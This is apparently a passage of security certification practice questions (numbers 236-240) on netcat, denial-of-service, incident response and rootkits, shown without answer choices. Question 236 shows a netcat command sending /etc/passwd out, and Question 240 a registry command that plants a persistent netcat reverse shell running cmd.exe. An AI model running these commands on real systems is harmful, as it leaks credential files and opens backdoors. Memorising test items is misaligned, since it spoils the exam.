Question 236
Which of the following actions is performed by the netcat command given below?
nc 55555 < /etc/passwd
Question 237
You discover that all available network bandwidth is being used by some unknown service. You discover that UDP
packets are being used to connect the echo service on one machine to the chargen service on another machine. What
kind of attack is this?
Question 238
Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover from malicious computer incidents, such as unauthorized access to a system or data, denialof-service, or unauthorized changes to system hardware, software, or data?
Question 239
Which of the following rootkits patches, hooks, or replaces system calls with versions that hide information about the attacker?
Question 240
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
